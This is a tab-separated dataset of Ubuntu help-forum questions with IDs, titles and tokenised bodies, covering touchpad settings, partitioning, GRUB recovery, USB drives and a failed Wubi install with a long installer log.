117010	how to disable touchpad tap in toshiba tecra r850 in oneiric - it is recognized as a ps/2 mouse	i know there 's a lot of similar questions , but nothing i have tried here works yet - perhaps i was doing it wrong . new laptop - toshiba tecra r850 with an install of oneiric 64 bit . mostly things are working well , but i have a problem with the touchpad ( or whatever it 's called ) - whenever i use it for moving the mouse pointer i accidentally tap on it - basically i am clicking all over the place by accident . so i want to disable the tap-as-click ( after all , i have buttons for clicks too ) . i open up `` mouse and touchpad '' and on the touchpad tab i check `` disable touchpad when typing '' and uncheck `` enable mouse clicks with touchpad '' . this does not achieve anything . ditto synaptiks and other similar tools . edit ok it turns out that this is a somewhat known problem - it seems the touchpad is not being recognized as a touchpad , it is seen as a ps/2 mouse . so any adjustments made with various settings programs to the `` touchpad '' do n't affect it . i 've been looking at solutions for getting the touchpad correctly recognized and not achieved it yet - seems there is a problem at the kernel level ... i tried ( foolishly ) a suggestion to replace the psmouse.ko driver ... this screwed some stuff up and did n't solve my problem . so - anyone know an answer ? thanks kibi
117013	how can i change the language order by command-line ( or text editor ) ?	how can i change the language order by command-line ( or text editor ) ? i.e . without using the graphical `` gnome-language-selector '' . ( or is there a better gui which allows you to select multiple language entries and move them all to another position directly , without having to do it one by one ? ) alternatively : where are the user-specific language settings stored ? i.e . the /etc/default/locale for users .
117014	what is the easiest way to merge / and /home ?	i have a separate / and /home partition . both have the same filesystem ( ext4 . ) how can i merge them ? ( what is the easiest way to merge them ? )
117015	update error : require installation of untrusted packages	it did n't fixed the error . so , how do i fix my gui update ? for every software i have to install it from command line because i got same error when install software from ubuntu software center .
117017	how to install gnome 3.4 ubuntu ?	yesterday they released a brand new version of gnome ... how can i install this gnome 3.4 in ubuntu ?
117019	libavg doesnot play ?	traceback ( most recent call last ) : file `` /usr/lib/python2.7/threading.py '' , line 552 , in __bootstrap_inner self.run ( ) file `` video.py '' , line 3381 , in run self.player.loadplugin ( `` libbrowsernode '' ) runtimeerror : ./libbrowsernode.so : undefined symbol : _zn3avg4node7setthisen5boost8weak_ptris0_eepkns_14nodedefinitione
117022	ubuntu network installation gives warning , tried with 2-3 images	i am trying to install ubuntu using pxe boot . i want to automate the whole process . but inbetween , it stucks at one point when it looks for ubuntu/main/oneiric/restricted/binary-i386/packages file and gives a warning message that its corrupted . i have seen ubuntu 11.04 64 bit , ubuntu 11.10 64 bit , ubuntu 11.10 32 bit dvd and its of the same size ( 1 kb ) . i am unable to predict why is it giving such a warning . i have attached the screenshot with the mail . i want to know that if i have to replace packages.gz with the ones available on ubuntu 's repository , then what changes do i need to make and which files do i need to replace . your help would be really helpful . do let me know how we can suppress this warning or remove it . link displaying image when error occurs : - https : //docs.google.com/file/d/0b2xsudg3gndmqjfazfpjrmrsvu9jc01pdkjlawdjuq/edit ? pli=1 thanks and regards rahul
117027	can not recover grub due to missing vmlinuz and intrd.img	i had a dedicated grub partition , upon trying to diagnose this problem , i decided to change the default partition to the ubuntu system . but it did n't work , so , i booted from the live cd , formatted the old boot partition and did a fresh install of grub , i did copy grub.cfg thinking it would be enough to boot the system . but i was wrong , now i am grub menu , that shows up , but what i did n't know was vmlinuz and intrd.img is also needed to boot a system . which is no where ? how can i get out of this stupid trouble
117032	usb 3.0 hard drive not being mounted on some reboots	i have a problem with my external hdd ( wd my book essential 1tb ) working on usb 3.0 port . i 'm using dual boot setup with windows 7 and ubuntu 11.10 , both 64 bit . while i 'm running windows and rebooting back to windows everything works well . when i 'm switching to ubuntu everything works great as well . but after the first reboot from ubuntu , neither windows nor ubuntu mounts the external drive . i have to reboot the device manually . i suspect that the problem is with unmounting the device on shutdown in ubuntu . this only happens with usb 3.0 ports . when i plug the same device into usb 2 port the problem does n't persist . does anyone have the same problem , or a clue what might going wrong ?
117034	reinstalling kernel images	i had a situation where i found that /boot had filled up . so i cleared up some space , then reinstalled the most recent kernel images in case the kernels were corrupt . i used : apt-get install -- reinstall linux-2.6.32-33-server ( as one example ) . now these reinstalled kernels will bomb out during reboot with a message unable to locate init . ( or similar ) . i could fix this the hard way - by pulling apart the images and finding out why it does n't work . the root volume is an lvm logical volume formatted with ext4 , and the boot grub entries match other working entries . however , i 'm sure there 's a reason that the package does n't seem to get it right . i 'd like to figure out if i 'm doing something wrong with the packages , or if it is something else . why wo n't these reinstalled kernels ( installed with apt ) boot successfully ?
117039	advanced partitioning question	i am looking to divide up a hdd for just ubuntu , so the entire file system will be in ext4 ; there will be no file sharing with windows so i 'm not to worried about that . what i am wondering is if i arrange my partitions as shown ( below ) will i be able to update my distribution and keep my skins/settings/etc ? here is some basic background information : the computer is custom built ( 16gb ddr3 , i5 sandy-bridge @ 3.4 ghz ) and has 2 hdd 's and 1 ssd they are as follows ( also the same chronological order in bios boot priority : 64 gb ssd - windows 7 64-bit operating system 160 gb hdd - nfts file system for program/storage space for windows 500 gb hdd - ext4 ( currently unalloacted ) for ubuntu 12.04 here is how i am planning on breaking up the 500 gb hdd for ubuntu , once again chronological order from start of the disk : 2gb ( swap ) 25gb operating system directory ( primary ) remainder ext4 home partition ( primary ) what i am wondering , and what i am hoping to achieve is the ability to upgrade my distributions while being able to keep my themes , settings , and files/etc in a seperate partition from the distro . will this method enable me to do this ? or is there another method that i can take to achieve this ? is the location of my swap file correct ? is the swap file to small/large ?
117041	how do we install java in wine ?	i have a windows file exe and i need wine and java to open it . i do n't know how to install java in wine . when i try to open java setup it says wrapper.createfile failed with error 32 : sharing violation . and it also say wrapper.createfile failed with error 123 : invalid name . please help .
117048	how to install the new gnome boxes ?	how can i install the new virtual machine app boxes ( https : //live.gnome.org/boxes ) in ubuntu ?
117053	how do i solve a `` no such calendar '' error with evolution and google calendar ?	i am using a google calendar with evolution for quite a while now . i was never having any troubles . just recently , i suppose just after an update , whenever i want to create a new event in evolution ( for the just mentioned google calendar ) i get the err message `` no such calendar '' . when i dismiss changes an re-open evolution the entry has been added anyway . this is somewhat annoying . i googled , but have n't found anything yet which suggests that it not problem many people have ! ? looking for help , maybe someone here knows an answer ! i have tried removing and readding the calendar
117055	why does clicking cairo-dock 's application menu applet open ubuntu software center ?	i use cairo-dock . when i click cairo-dock 's application menu applet , ubuntu software center opens . can anyone give me a solution ? remove software centre icon from dock reboot
117064	ubuntu 10.04 can not detect the monitor , low resolution produced , does this guide work ?	i am working in office and i ca n't risk to format my harddisk but my screen can not detect native resolution ( using wide screen ) , the max resolution it provdies is 1280x1024 and i want 1440x900 . i am afraid i will do something wrong and can not boot up the computer again later and need to reformat harddisk ... . i found this guide useful but not sure does it reli work ? does anyone can help me or comment this guide ? i do n't have any nvidia or ati graphic card but only with intel onboard graphics display , the chipset should be intel h67 with sandy bridge . thanks a lot .
117065	how do i find out the name of the ssid i 'm connected to from the command line ?	neither iwconfig nor iwlist seem to be able to do this for me .
117069	why i ca n't see chrome in dash	i have installed google chrome and its works good . but i ca n't see it in panel what is the problem ?
117071	xubuntu kwin + xfce at session	i 'm trying to use kwin with xfce . if i go into my session with xfwm4 and launch `` kwin - replace '' ( alt f2 ) everything works fine . unfortunately , if i log out and save last session , at log in all the virtual desktops have no background ( except the first one ) how can i start kwin at login without any problems ?
117073	i ca n't install using wubi due to permission denied error	i ca n't install ubuntu 11.10 inside my windows 7 . it shows permission denied while installation . it gave a log file having the following data : 03-29 20:19 debug tasklist : # running tasklist ... 03-29 20:19 debug tasklist : # # running select_target_dir ... 03-29 20:19 info windowsbackend : installing into d : \ubuntu 03-29 20:19 debug tasklist : # # finished select_target_dir 03-29 20:19 debug tasklist : # # running create_dir_structure ... 03-29 20:19 debug commonbackend : creating dir d : \ubuntu 03-29 20:19 debug commonbackend : creating dir d : \ubuntu\disks 03-29 20:19 debug commonbackend : creating dir d : \ubuntu\install 03-29 20:19 debug commonbackend : creating dir d : \ubuntu\install\boot 03-29 20:19 debug commonbackend : creating dir d : \ubuntu\disks\boot 03-29 20:19 debug commonbackend : creating dir d : \ubuntu\disks\boot\grub 03-29 20:19 debug commonbackend : creating dir d : \ubuntu\install\boot\grub 03-29 20:19 debug tasklist : # # finished create_dir_structure 03-29 20:19 debug tasklist : # # running uncompress_target_dir ... 03-29 20:19 debug tasklist : # # finished uncompress_target_dir 03-29 20:19 debug tasklist : # # running create_uninstaller ... 03-29 20:19 debug windowsbackend : copying uninstaller e : \wubi.exe - > d : \ubuntu\uninstall-wubi.exe 03-29 20:19 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi uninstallstring d : \ubuntu\uninstall-wubi.exe 03-29 20:19 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi installationdir d : \ubuntu 03-29 20:19 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi displayname ubuntu 03-29 20:19 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi displayicon d : \ubuntu\ubuntu.ico 03-29 20:19 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi displayversion 11.10-rev241 03-29 20:19 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi publisher ubuntu 03-29 20:19 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi urlinfoabout http : //www.ubuntu.com 03-29 20:19 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi helplink http : //www.ubuntu.com/support 03-29 20:19 debug tasklist : # # finished create_uninstaller 03-29 20:19 debug tasklist : # # running copy_installation_files ... 03-29 20:19 debug windowsbackend : copying c : \users\home\appdata\local\temp\pylb911.tmp\data\custom-installation - > d : \ubuntu\install\custom-installation 03-29 20:19 debug windowsbackend : copying c : \users\home\appdata\local\temp\pylb911.tmp\winboot - > d : \ubuntu\winboot 03-29 20:19 debug windowsbackend : copying c : \users\home\appdata\local\temp\pylb911.tmp\data\images\ubuntu.ico - > d : \ubuntu\ubuntu.ico 03-29 20:19 debug tasklist : # # finished copy_installation_files 03-29 20:19 debug tasklist : # # running get_iso ... 03-29 20:19 debug tasklist : new task copy_file 03-29 20:19 debug tasklist : # # # running copy_file ... 03-29 20:23 error tasklist : [ errno 13 ] permission denied traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\utils.py '' , line 202 , in copy_file ioerror : [ errno 13 ] permission denied 03-29 20:23 debug tasklist : # cancelling tasklist 03-29 20:23 debug tasklist : new task check_iso 03-29 20:23 error root : [ errno 13 ] permission denied traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 130 , in select_task file `` \lib\wubi\application.py '' , line 205 , in run_cd_menu file `` \lib\wubi\application.py '' , line 120 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\utils.py '' , line 202 , in copy_file ioerror : [ errno 13 ] permission denied 03-29 20:23 error tasklist : 'windowsbackend ' object has no attribute 'iso_path' traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 579 , in get_iso file `` \lib\wubi\backends\common\backend.py '' , line 565 , in use_iso attributeerror : 'windowsbackend ' object has no attribute 'iso_path' 03-29 20:23 debug tasklist : # cancelling tasklist 03-29 20:23 debug tasklist : # finished tasklist 03-29 20:29 info root : === wubi 11.10 rev241 === 03-29 20:29 debug root : logfile is c : \users\home\appdata\local\temp\wubi-11.10-rev241.log 03-29 20:29 debug root : sys.argv = [ 'main.pyo ' , ' -- exefile= '' e : \\wubi.exe '' ' ] 03-29 20:29 debug commonbackend : data_dir=c : \users\home\appdata\local\temp\pyl3487.tmp\data 03-29 20:29 debug windowsbackend : 7z=c : \users\home\appdata\local\temp\pyl3487.tmp\bin\7z.exe 03-29 20:29 debug windowsbackend : startup_folder=c : \programdata\microsoft\windows\start menu\programs\startup 03-29 20:29 debug commonbackend : fetching basic info ... 03-29 20:29 debug commonbackend : original_exe=e : \wubi.exe 03-29 20:29 debug commonbackend : platform=win32 03-29 20:29 debug commonbackend : osname=nt 03-29 20:29 debug commonbackend : language=en_in 03-29 20:29 debug commonbackend : encoding=cp1252 03-29 20:29 debug windowsbackend : arch=amd64 03-29 20:29 debug commonbackend : parsing isolist=c : \users\home\appdata\local\temp\pyl3487.tmp\data\isolist.ini 03-29 20:29 debug commonbackend : adding distro xubuntu-i386 03-29 20:29 debug commonbackend : adding distro xubuntu-amd64 03-29 20:29 debug commonbackend : adding distro kubuntu-amd64 03-29 20:29 debug commonbackend : adding distro mythbuntu-i386 03-29 20:29 debug commonbackend : adding distro ubuntu-amd64 03-29 20:29 debug commonbackend : adding distro ubuntu-i386 03-29 20:29 debug commonbackend : adding distro mythbuntu-amd64 03-29 20:29 debug commonbackend : adding distro kubuntu-i386 03-29 20:29 debug windowsbackend : fetching host info ... 03-29 20:29 debug windowsbackend : registry_key=software\microsoft\windows\currentversion\uninstall\wubi 03-29 20:29 debug windowsbackend : windows version=vista 03-29 20:29 debug windowsbackend : windows_version2=windows 7 home basic 03-29 20:29 debug windowsbackend : windows_sp=none 03-29 20:29 debug windowsbackend : windows_build=7601 03-29 20:29 debug windowsbackend : gmt=5 03-29 20:29 debug windowsbackend : country=in 03-29 20:29 debug windowsbackend : timezone=asia/calcutta 03-29 20:29 debug windowsbackend : windows_username=home 03-29 20:29 debug windowsbackend : user_full_name=home 03-29 20:29 debug windowsbackend : user_directory=c : \users\home 03-29 20:29 debug windowsbackend : windows_language_code=1033 03-29 20:29 debug windowsbackend : windows_language=english 03-29 20:29 debug windowsbackend : processor_name=intel ( r ) core ( tm ) i3 cpu m 370 @ 2.40ghz 03-29 20:29 debug windowsbackend : bootloader=vista 03-29 20:29 debug windowsbackend : system_drive=drive ( c : hd 61135.1523438 mb free ntfs ) 03-29 20:29 debug windowsbackend : drive=drive ( c : hd 61135.1523438 mb free ntfs ) 03-29 20:29 debug windowsbackend : drive=drive ( d : hd 12742.5507813 mb free ntfs ) 03-29 20:29 debug windowsbackend : drive=drive ( e : cd 0.0 mb free cdfs ) 03-29 20:29 debug windowsbackend : drive=drive ( f : cd 0.0 mb free ) 03-29 20:29 debug windowsbackend : drive=drive ( g : hd 93.22265625 mb free fat32 ) 03-29 20:29 debug windowsbackend : drive=drive ( q : hd 0.0 mb free ) 03-29 20:29 debug windowsbackend : uninstaller_path=d : \ubuntu\uninstall-wubi.exe 03-29 20:29 debug windowsbackend : previous_target_dir=d : \ubuntu 03-29 20:29 debug windowsbackend : previous_distro_name=ubuntu 03-29 20:29 debug windowsbackend : keyboard_id=67699721 03-29 20:29 debug windowsbackend : keyboard_layout=us 03-29 20:29 debug windowsbackend : keyboard_variant= 03-29 20:29 debug commonbackend : python locale= ( 'en_in ' , 'cp1252 ' ) 03-29 20:29 debug commonbackend : locale=en_in 03-29 20:29 debug windowsbackend : total_memory_mb=3893.859375 03-29 20:29 debug commonbackend : searching isos on usb devices 03-29 20:29 debug commonbackend : searching for local cds 03-29 20:29 debug distro : checking whether c : \users\home\appdata\local\temp\pyl3487.tmp is a valid ubuntu cd 03-29 20:29 debug distro : does not contain c : \users\home\appdata\local\temp\pyl3487.tmp\casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether c : \users\home\appdata\local\temp\pyl3487.tmp is a valid ubuntu cd 03-29 20:29 debug distro : does not contain c : \users\home\appdata\local\temp\pyl3487.tmp\casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether c : \users\home\appdata\local\temp\pyl3487.tmp is a valid kubuntu cd 03-29 20:29 debug distro : does not contain c : \users\home\appdata\local\temp\pyl3487.tmp\casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether c : \users\home\appdata\local\temp\pyl3487.tmp is a valid kubuntu cd 03-29 20:29 debug distro : does not contain c : \users\home\appdata\local\temp\pyl3487.tmp\casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether c : \users\home\appdata\local\temp\pyl3487.tmp is a valid xubuntu cd 03-29 20:29 debug distro : does not contain c : \users\home\appdata\local\temp\pyl3487.tmp\casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether c : \users\home\appdata\local\temp\pyl3487.tmp is a valid xubuntu cd 03-29 20:29 debug distro : does not contain c : \users\home\appdata\local\temp\pyl3487.tmp\casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether c : \users\home\appdata\local\temp\pyl3487.tmp is a valid mythbuntu cd 03-29 20:29 debug distro : does not contain c : \users\home\appdata\local\temp\pyl3487.tmp\casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether c : \users\home\appdata\local\temp\pyl3487.tmp is a valid mythbuntu cd 03-29 20:29 debug distro : does not contain c : \users\home\appdata\local\temp\pyl3487.tmp\casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether d : \ is a valid ubuntu cd 03-29 20:29 debug distro : does not contain d : \casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether d : \ is a valid ubuntu cd 03-29 20:29 debug distro : does not contain d : \casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether d : \ is a valid kubuntu cd 03-29 20:29 debug distro : does not contain d : \casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether d : \ is a valid kubuntu cd 03-29 20:29 debug distro : does not contain d : \casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether d : \ is a valid xubuntu cd 03-29 20:29 debug distro : does not contain d : \casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether d : \ is a valid xubuntu cd 03-29 20:29 debug distro : does not contain d : \casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether d : \ is a valid mythbuntu cd 03-29 20:29 debug distro : does not contain d : \casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether d : \ is a valid mythbuntu cd 03-29 20:29 debug distro : does not contain d : \casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether e : \ is a valid ubuntu cd 03-29 20:29 debug distro : parsing info from str=ubuntu 11.10 `` oneiric ocelot '' - release i386 ( 20111012 ) 03-29 20:29 debug distro : parsed info= { 'name ' : 'ubuntu ' , 'subversion ' : 'release ' , 'version ' : '11.10 ' , 'build ' : '20111012 ' , 'codename ' : 'oneiric ocelot ' , 'arch ' : 'i386 ' } 03-29 20:29 info distro : found a valid cd for ubuntu : e : \ 03-29 20:29 info root : running the cd menu ... 03-29 20:29 debug windowsfrontend : __init__ ... 03-29 20:29 debug windowsfrontend : on_init ... 03-29 20:29 info winuipage : appname=wubi , localedir=c : \users\home\appdata\local\temp\pyl3487.tmp\translations , languages= [ 'en_in ' , 'en ' ] 03-29 20:29 info winuipage : appname=wubi , localedir=c : \users\home\appdata\local\temp\pyl3487.tmp\translations , languages= [ 'en_in ' , 'en ' ] 03-29 20:29 info root : cd menu finished 03-29 20:29 info root : already installed , running the uninstaller ... 03-29 20:29 info root : running the uninstaller ... 03-29 20:29 info commonbackend : this is the uninstaller running 03-29 20:29 info winuipage : appname=wubi , localedir=c : \users\home\appdata\local\temp\pyl3487.tmp\translations , languages= [ 'en_in ' , 'en ' ] 03-29 20:29 info root : received settings 03-29 20:29 info winuipage : appname=wubi , localedir=c : \users\home\appdata\local\temp\pyl3487.tmp\translations , languages= [ 'en_in ' , 'en ' ] 03-29 20:29 debug tasklist : # running tasklist ... 03-29 20:29 debug tasklist : # # running remove bootloader entry ... 03-29 20:29 debug windowsbackend : could not find bcd id 03-29 20:29 debug windowsbackend : undo_bootini c : 03-29 20:29 debug windowsbackend : undo_configsys drive ( c : hd 61135.1523438 mb free ntfs ) 03-29 20:29 debug windowsbackend : undo_bootini d : 03-29 20:29 debug windowsbackend : undo_configsys drive ( d : hd 12742.5507813 mb free ntfs ) 03-29 20:29 debug windowsbackend : undo_bootini g : 03-29 20:29 debug windowsbackend : undo_configsys drive ( g : hd 93.22265625 mb free fat32 ) 03-29 20:29 debug windowsbackend : undo_bootini q : 03-29 20:29 debug windowsbackend : undo_configsys drive ( q : hd 0.0 mb free ) 03-29 20:29 debug tasklist : # # finished remove bootloader entry 03-29 20:29 debug tasklist : # # running remove target dir ... 03-29 20:29 debug commonbackend : deleting d : \ubuntu 03-29 20:29 debug tasklist : # # finished remove target dir 03-29 20:29 debug tasklist : # # running remove registry key ... 03-29 20:29 debug tasklist : # # finished remove registry key 03-29 20:29 debug tasklist : # finished tasklist 03-29 20:29 info root : almost finished uninstalling 03-29 20:29 info root : finished uninstallation 03-29 20:29 debug commonbackend : fetching basic info ... 03-29 20:29 debug commonbackend : original_exe=e : \wubi.exe 03-29 20:29 debug commonbackend : platform=win32 03-29 20:29 debug commonbackend : osname=nt 03-29 20:29 debug windowsbackend : arch=amd64 03-29 20:29 debug commonbackend : parsing isolist=c : \users\home\appdata\local\temp\pyl3487.tmp\data\isolist.ini 03-29 20:29 debug commonbackend : adding distro xubuntu-i386 03-29 20:29 debug commonbackend : adding distro xubuntu-amd64 03-29 20:29 debug commonbackend : adding distro kubuntu-amd64 03-29 20:29 debug commonbackend : adding distro mythbuntu-i386 03-29 20:29 debug commonbackend : adding distro ubuntu-amd64 03-29 20:29 debug commonbackend : adding distro ubuntu-i386 03-29 20:29 debug commonbackend : adding distro mythbuntu-amd64 03-29 20:29 debug commonbackend : adding distro kubuntu-i386 03-29 20:29 debug windowsbackend : fetching host info ... 03-29 20:29 debug windowsbackend : registry_key=software\microsoft\windows\currentversion\uninstall\wubi 03-29 20:29 debug windowsbackend : windows version=vista 03-29 20:29 debug windowsbackend : windows_version2=windows 7 home basic 03-29 20:29 debug windowsbackend : windows_sp=none 03-29 20:29 debug windowsbackend : windows_build=7601 03-29 20:29 debug windowsbackend : gmt=5 03-29 20:29 debug windowsbackend : country=in 03-29 20:29 debug windowsbackend : timezone=asia/calcutta 03-29 20:29 debug windowsbackend : windows_username=home 03-29 20:29 debug windowsbackend : user_full_name=home 03-29 20:29 debug windowsbackend : user_directory=c : \users\home 03-29 20:29 debug windowsbackend : windows_language_code=1033 03-29 20:29 debug windowsbackend : windows_language=english 03-29 20:29 debug windowsbackend : processor_name=intel ( r ) core ( tm ) i3 cpu m 370 @ 2.40ghz 03-29 20:29 debug windowsbackend : bootloader=vista 03-29 20:29 debug windowsbackend : system_drive=drive ( c : hd 61134.8632813 mb free ntfs ) 03-29 20:29 debug windowsbackend : drive=drive ( c : hd 61134.8632813 mb free ntfs ) 03-29 20:29 debug windowsbackend : drive=drive ( d : hd 12953.140625 mb free ntfs ) 03-29 20:29 debug windowsbackend : drive=drive ( e : cd 0.0 mb free cdfs ) 03-29 20:29 debug windowsbackend : drive=drive ( f : cd 0.0 mb free ) 03-29 20:29 debug windowsbackend : drive=drive ( g : hd 93.22265625 mb free fat32 ) 03-29 20:29 debug windowsbackend : drive=drive ( q : hd 0.0 mb free ) 03-29 20:29 debug windowsbackend : uninstaller_path=none 03-29 20:29 debug windowsbackend : previous_target_dir=none 03-29 20:29 debug windowsbackend : previous_distro_name=none 03-29 20:29 debug windowsbackend : keyboard_id=67699721 03-29 20:29 debug windowsbackend : keyboard_layout=us 03-29 20:29 debug windowsbackend : keyboard_variant= 03-29 20:29 debug windowsbackend : total_memory_mb=3893.859375 03-29 20:29 debug commonbackend : searching isos on usb devices 03-29 20:29 debug commonbackend : searching for local cds 03-29 20:29 debug distro : checking whether c : \users\home\appdata\local\temp\pyl3487.tmp is a valid ubuntu cd 03-29 20:29 debug distro : does not contain c : \users\home\appdata\local\temp\pyl3487.tmp\casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether c : \users\home\appdata\local\temp\pyl3487.tmp is a valid ubuntu cd 03-29 20:29 debug distro : does not contain c : \users\home\appdata\local\temp\pyl3487.tmp\casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether c : \users\home\appdata\local\temp\pyl3487.tmp is a valid kubuntu cd 03-29 20:29 debug distro : does not contain c : \users\home\appdata\local\temp\pyl3487.tmp\casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether c : \users\home\appdata\local\temp\pyl3487.tmp is a valid kubuntu cd 03-29 20:29 debug distro : does not contain c : \users\home\appdata\local\temp\pyl3487.tmp\casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether c : \users\home\appdata\local\temp\pyl3487.tmp is a valid xubuntu cd 03-29 20:29 debug distro : does not contain c : \users\home\appdata\local\temp\pyl3487.tmp\casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether c : \users\home\appdata\local\temp\pyl3487.tmp is a valid xubuntu cd 03-29 20:29 debug distro : does not contain c : \users\home\appdata\local\temp\pyl3487.tmp\casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether c : \users\home\appdata\local\temp\pyl3487.tmp is a valid mythbuntu cd 03-29 20:29 debug distro : does not contain c : \users\home\appdata\local\temp\pyl3487.tmp\casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether c : \users\home\appdata\local\temp\pyl3487.tmp is a valid mythbuntu cd 03-29 20:29 debug distro : does not contain c : \users\home\appdata\local\temp\pyl3487.tmp\casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether d : \ is a valid ubuntu cd 03-29 20:29 debug distro : does not contain d : \casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether d : \ is a valid ubuntu cd 03-29 20:29 debug distro : does not contain d : \casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether d : \ is a valid kubuntu cd 03-29 20:29 debug distro : does not contain d : \casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether d : \ is a valid kubuntu cd 03-29 20:29 debug distro : does not contain d : \casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether d : \ is a valid xubuntu cd 03-29 20:29 debug distro : does not contain d : \casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether d : \ is a valid xubuntu cd 03-29 20:29 debug distro : does not contain d : \casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether d : \ is a valid mythbuntu cd 03-29 20:29 debug distro : does not contain d : \casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether d : \ is a valid mythbuntu cd 03-29 20:29 debug distro : does not contain d : \casper\filesystem.squashfs 03-29 20:29 debug distro : checking whether e : \ is a valid ubuntu cd 03-29 20:29 info distro : found a valid cd for ubuntu : e : \ 03-29 20:29 info root : running the installer ... 03-29 20:29 info winuipage : appname=wubi , localedir=c : \users\home\appdata\local\temp\pyl3487.tmp\translations , languages= [ 'en_in ' , 'en ' ] 03-29 20:29 info winuipage : appname=wubi , localedir=c : \users\home\appdata\local\temp\pyl3487.tmp\translations , languages= [ 'en_in ' , 'en ' ] 03-29 20:30 debug winuiinstallationpage : target_drive=c : , installation_size=8000mb , distro_name=ubuntu , language=en_us , locale=en_us.utf-8 , username=taksh 03-29 20:30 info root : received settings 03-29 20:30 info winuipage : appname=wubi , localedir=c : \users\home\appdata\local\temp\pyl3487.tmp\translations , languages= [ 'en_us ' , 'en ' ] 03-29 20:30 debug tasklist : # running tasklist ... 03-29 20:30 debug tasklist : # # running select_target_dir ... 03-29 20:30 info windowsbackend : installing into c : \ubuntu 03-29 20:30 debug tasklist : # # finished select_target_dir 03-29 20:30 debug tasklist : # # running create_dir_structure ... 03-29 20:30 debug commonbackend : creating dir c : \ubuntu 03-29 20:30 debug commonbackend : creating dir c : \ubuntu\disks 03-29 20:30 debug commonbackend : creating dir c : \ubuntu\install 03-29 20:30 debug commonbackend : creating dir c : \ubuntu\install\boot 03-29 20:30 debug commonbackend : creating dir c : \ubuntu\disks\boot 03-29 20:30 debug commonbackend : creating dir c : \ubuntu\disks\boot\grub 03-29 20:30 debug commonbackend : creating dir c : \ubuntu\install\boot\grub 03-29 20:30 debug tasklist : # # finished create_dir_structure 03-29 20:30 debug tasklist : # # running uncompress_target_dir ... 03-29 20:30 debug tasklist : # # finished uncompress_target_dir 03-29 20:30 debug tasklist : # # running create_uninstaller ... 03-29 20:30 debug windowsbackend : copying uninstaller e : \wubi.exe - > c : \ubuntu\uninstall-wubi.exe 03-29 20:30 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi uninstallstring c : \ubuntu\uninstall-wubi.exe 03-29 20:30 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi installationdir c : \ubuntu 03-29 20:30 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi displayname ubuntu 03-29 20:30 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi displayicon c : \ubuntu\ubuntu.ico 03-29 20:30 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi displayversion 11.10-rev241 03-29 20:30 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi publisher ubuntu 03-29 20:30 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi urlinfoabout http : //www.ubuntu.com 03-29 20:30 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi helplink http : //www.ubuntu.com/support 03-29 20:30 debug tasklist : # # finished create_uninstaller 03-29 20:30 debug tasklist : # # running copy_installation_files ... 03-29 20:30 debug windowsbackend : copying c : \users\home\appdata\local\temp\pyl3487.tmp\data\custom-installation - > c : \ubuntu\install\custom-installation 03-29 20:30 debug windowsbackend : copying c : \users\home\appdata\local\temp\pyl3487.tmp\winboot - > c : \ubuntu\winboot 03-29 20:30 debug windowsbackend : copying c : \users\home\appdata\local\temp\pyl3487.tmp\data\images\ubuntu.ico - > c : \ubuntu\ubuntu.ico 03-29 20:30 debug tasklist : # # finished copy_installation_files 03-29 20:30 debug tasklist : # # running get_iso ... 03-29 20:30 debug tasklist : new task copy_file 03-29 20:30 debug tasklist : # # # running copy_file ... 03-29 20:34 error tasklist : [ errno 13 ] permission denied traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 